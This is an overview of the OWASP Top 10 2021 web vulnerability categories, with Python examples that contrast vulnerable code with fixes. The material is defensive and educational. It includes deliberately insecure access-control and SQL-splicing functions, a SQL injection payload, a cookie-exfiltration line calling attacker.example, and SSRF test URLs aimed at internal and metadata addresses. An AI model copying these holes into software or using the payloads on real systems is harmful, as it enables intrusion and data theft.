OWASP Top 10 2021
The OWASP Top 10 is an overview of the categories of vulnerabilities that security experts consider most critical for web applications. It is not a ready-made checklist and does not cover every type of vulnerability, but it gives a good overview of a complex subject. The Top 10 therefore forms a solid basis for the security tests we offer.
Broken Access Control (A1)
Restrictions on what a user may or may not do within an application are in many cases not enforced correctly. Attackers exploit these flaws to reach functionality and/or data they are not authorized to access, for example by changing an identifier in a URL or API request to that of another user's record.
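As an added example (not code from the original page), the following Python shows the most common form of this flaw, an insecure direct object reference, beside its corrected form. The invoice endpoint, the `User`/`Invoice` types and the sample records are all constructed for illustration; the fix is an object-level authorization check that denies by default and returns the same error for a missing record and a record owned by someone else, so the endpoint does not become an oracle for valid ids.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    id: int
    role: str  # "customer" or "admin" (hypothetical roles)


@dataclass(frozen=True)
class Invoice:
    id: int
    owner_id: int
    total: str


# Constructed sample data standing in for a database table.
INVOICES = {
    1001: Invoice(1001, owner_id=1, total="120.00"),
    1002: Invoice(1002, owner_id=2, total="9800.00"),
}


class Forbidden(Exception):
    """Raised when the caller may not see the requested record."""


def get_invoice_vulnerable(user: User, invoice_id: int) -> Invoice:
    """Broken access control: the caller is authenticated, but nothing checks
    who owns the record, so any logged-in user can read any invoice by
    guessing its id."""
    return INVOICES[invoice_id]


def get_invoice(user: User, invoice_id: int) -> Invoice:
    """Deny by default: the record is returned only if the caller owns it or
    holds a role that is explicitly allowed to read all invoices. A missing
    record and a foreign record get the same answer, so the endpoint cannot
    be used to enumerate which ids exist."""
    invoice = INVOICES.get(invoice_id)
    if invoice is None:
        raise Forbidden()
    if user.role == "admin" or invoice.owner_id == user.id:
        return invoice
    raise Forbidden()


def can_read(user: User, invoice_id: int) -> bool:
    """Convenience wrapper: True if the hardened endpoint would serve the record."""
    try:
        get_invoice(user, invoice_id)
        return True
    except Forbidden:
        return False


if __name__ == "__main__":
    alice = User(1, "customer")
    # The vulnerable endpoint happily hands Alice someone else's invoice.
    print(get_invoice_vulnerable(alice, 1002))
    # The hardened endpoint does not.
    print(can_read(alice, 1001), can_read(alice, 1002))
```

The check belongs in the server-side data access path, not in the client or in a URL that is merely hidden; a pentester will simply try neighbouring ids.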
Cryptographic Failures (A2)
Many applications and API endpoints do not adequately protect sensitive data such as personal data, documents and authentication data. Attackers can then steal or modify such data to commit credit card fraud, identity theft or other crimes. Sensitive data must be given extra protection through encryption or other special precautions.
Injection (A3)
Injection vulnerabilities, such as SQL, OS command or LDAP injection, arise when unvalidated data supplied by an attacker is sent to an interpreter as part of a command or query. Such data can trick the interpreter into executing unintended commands or disclosing data without authorization.
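As an added example (not from the original page), the following Python shows a SQL injection in a user lookup and the parameterized query that removes it. The `users` table and its rows are constructed in an in-memory SQLite database so the script runs offline; the payload `' OR '1'='1` is the classic tautology that turns a lookup for one user into a dump of the whole table.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """In-memory table with constructed rows, standing in for a real users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (username TEXT, password_hash TEXT, is_admin INTEGER)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "hash-a", 0), ("bob", "hash-b", 0), ("admin", "hash-c", 1)],
    )
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """Untrusted input is spliced into the SQL text itself, so the input can
    change the structure of the query rather than only its data."""
    sql = f"SELECT username, is_admin FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def find_user(conn: sqlite3.Connection, username: str) -> list:
    """Parameterized query: the SQL text is fixed and the value travels
    separately to the driver, so it can never be parsed as SQL."""
    sql = "SELECT username, is_admin FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


if __name__ == "__main__":
    conn = build_db()
    payload = "' OR '1'='1"
    # Becomes: ... WHERE username = '' OR '1'='1'  -> every row
    print(find_user_vulnerable(conn, payload))
    # Looks for a user literally named "' OR '1'='1"  -> no rows
    print(find_user(conn, payload))
```

The same principle applies to OS command and LDAP injection: keep the command or filter template fixed and pass untrusted values through an API that treats them strictly as data (argument lists instead of shell strings, escaped LDAP filter values), rather than trying to sanitize the input by hand.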
Insecure Design (A4)
Applications must be designed securely from the start to avoid flaws. An insecure design cannot be fixed by a perfect implementation, because by definition the security controls needed to defend against specific attacks were never created. Already during the design phase, developers should make use of threat modelling, secure design patterns and principles, and reference architectures.
Security Misconfiguration (A5)
Good security requires a secure configuration that is defined and tailored for the application, frameworks, application server, web server, database server and platform. Security settings must be defined, implemented and maintained, because default settings are often insecure. In addition, all software must be kept up to date.
Vulnerable & Outdated Components (A6)
Components such as libraries, frameworks and other software modules usually run with the same privileges as the application itself. Running a vulnerable component can result in data loss or facilitate a server takeover. Components with known vulnerabilities undermine the security of the application and open the door to a wide range of attacks.
Identification and Authentication Failures (A7)
Authentication and session management mechanisms are often implemented incorrectly, allowing attackers to assume the identity of other users, for example by guessing or stealing passwords, session tokens or keys.
Software & Data Integrity Failures (A8)
Applications that rely on plugins, libraries or modules from untrusted sources, repositories and content delivery networks (CDNs) are at risk of integrity violations. An insecure CI/CD pipeline can lead to unauthorized access, malicious code or system compromise. Measures such as verifying digital signatures or pinned hashes are necessary to ensure that code and data come from a trusted source and have not been modified in transit.
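As an added example (not from the original page), the following Python implements the integrity check a consumer of a CDN-hosted library performs: a hash of the known-good file is pinned, and the fetched bytes are refused unless they match. It uses the Subresource Integrity string format (`sha384-<base64>`) that browsers accept in a `<script integrity="...">` attribute; the "library" bytes and the tampered copy are constructed here for illustration.

```python
import base64
import hashlib
import hmac

STRONG_ALGORITHMS = ("sha256", "sha384", "sha512")


def sri_digest(content: bytes, algorithm: str = "sha384") -> str:
    """Produce an integrity string in Subresource Integrity format,
    '<alg>-<base64 digest>', for pinning a known-good artifact."""
    digest = hashlib.new(algorithm, content).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def verify_integrity(content: bytes, integrity: str) -> bool:
    """Check fetched bytes against a pinned integrity value before using them.
    Only SHA-2 algorithms are accepted (a pin made with a broken hash proves
    nothing), malformed pins fail closed, and the comparison is constant-time."""
    try:
        algorithm, expected_b64 = integrity.split("-", 1)
        expected = base64.b64decode(expected_b64, validate=True)
    except ValueError:  # also covers binascii.Error from b64decode
        return False
    if algorithm not in STRONG_ALGORITHMS:
        return False
    actual = hashlib.new(algorithm, content).digest()
    return hmac.compare_digest(actual, expected)


def load_library(fetched: bytes, pinned: str) -> bytes:
    """Hypothetical loader: returns the bytes only if they match the pin."""
    if not verify_integrity(fetched, pinned):
        raise RuntimeError("integrity check failed; refusing to load artifact")
    return fetched


if __name__ == "__main__":
    # Constructed stand-in for a JavaScript library served from a CDN.
    library = b"export function add(a, b) { return a + b; }\n"
    pin = sri_digest(library)
    print(pin)
    print(verify_integrity(library, pin))
    # A tampered copy, as served by a compromised CDN, fails the check.
    tampered = library + b"fetch('https://attacker.example/?c=' + document.cookie);\n"
    print(verify_integrity(tampered, pin))
```

A pinned hash only helps if the pin itself is obtained out of band (from the vendor's release page or your own build) and stored in your repository, not fetched from the same CDN. For signed artifacts such as packages and container images the pattern is the same, with a signature verified against the publisher's public key in place of the hash comparison.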
Security Logging & Monitoring Failures (A9)
A lack of logging and monitoring gives attackers time to dig deeper into a system and establish persistent access. On average, a breach is only detected after more than 200 days. That gives attackers ample time to move on to other systems and view, change or even delete stored data.
Server-Side Request Forgery (A10)
Fetching URLs is a common scenario within applications, but it can lead to problems when the URLs come from user input. Without any validation, it allows an attacker to make the application send a request to an unexpected destination, even one that is protected by a firewall, VPN or other network access controls (ACLs).
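As an added example (not from the original page), the following Python validates a user-supplied URL before a server-side fetch: it allows only `http`/`https`, rejects embedded credentials, optionally enforces a host allowlist, and resolves the hostname so that any answer pointing at a loopback, private, link-local or otherwise non-global address (including the cloud metadata address 169.254.169.254 and IPv4-mapped IPv6 forms such as `::ffff:127.0.0.1`) is refused. The resolver is injectable; the script uses a constructed DNS table so it runs offline, and the hostnames in that table are invented.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


class UnsafeURL(ValueError):
    """Raised when a URL must not be fetched server-side."""


def resolve_all(hostname: str) -> set:
    """Default resolver: every address the name currently maps to (v4 and v6)."""
    return {info[4][0] for info in socket.getaddrinfo(hostname, None)}


# Constructed DNS table for the offline demonstration (hostnames are invented).
FAKE_DNS = {
    "api.partner.example": {"93.184.216.34"},
    "internal.corp.example": {"10.0.0.5"},
    "rebind.example": {"93.184.216.34", "127.0.0.1"},  # one bad answer is enough
}


def fake_resolver(hostname: str) -> set:
    try:
        ipaddress.ip_address(hostname)  # IP literal: no lookup needed
        return {hostname}
    except ValueError:
        pass
    if hostname in FAKE_DNS:
        return FAKE_DNS[hostname]
    raise socket.gaierror(-2, "Name or service not known")


def validate_outbound_url(url: str, allowed_hosts=None, resolver=resolve_all):
    """Return (url, sorted resolved addresses) if the URL is acceptable for a
    server-side fetch; raise UnsafeURL otherwise."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise UnsafeURL(f"scheme not allowed: {parts.scheme!r}")
    if parts.username or parts.password:
        raise UnsafeURL("credentials in URL")
    host = parts.hostname
    if not host:
        raise UnsafeURL("missing host")
    if allowed_hosts is not None and host not in allowed_hosts:
        raise UnsafeURL(f"host not in allowlist: {host}")
    try:
        addresses = resolver(host)
    except socket.gaierror as exc:
        raise UnsafeURL(f"cannot resolve {host}") from exc
    if not addresses:
        raise UnsafeURL(f"no addresses for {host}")
    for addr in addresses:
        ip = ipaddress.ip_address(addr)
        # Unwrap ::ffff:a.b.c.d so the IPv4 checks apply to the real target.
        if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
            ip = ip.ipv4_mapped
        if not ip.is_global:
            raise UnsafeURL(f"{host} resolves to non-global address {ip}")
    return parts.geturl(), sorted(addresses)


def is_safe_outbound_url(url: str, **kwargs) -> bool:
    try:
        validate_outbound_url(url, **kwargs)
        return True
    except UnsafeURL:
        return False


if __name__ == "__main__":
    for candidate in [
        "https://api.partner.example/v1/report",
        "http://127.0.0.1:8080/admin",
        "http://169.254.169.254/latest/meta-data/",
        "http://[::ffff:127.0.0.1]/",
        "http://internal.corp.example/",
        "file:///etc/passwd",
    ]:
        print(is_safe_outbound_url(candidate, resolver=fake_resolver), candidate)
```

Two caveats a pentester will probe: the addresses checked here must be the ones actually connected to (resolving once for the check and again for the fetch invites DNS rebinding, so pin the validated IP or resolve inside the HTTP client), and redirects returned by the remote server must go through the same validation, since an allowed host can 302 the application to an internal address. Where the set of legitimate destinations is known, an allowlist of hosts is simpler and stronger than blocklisting address ranges.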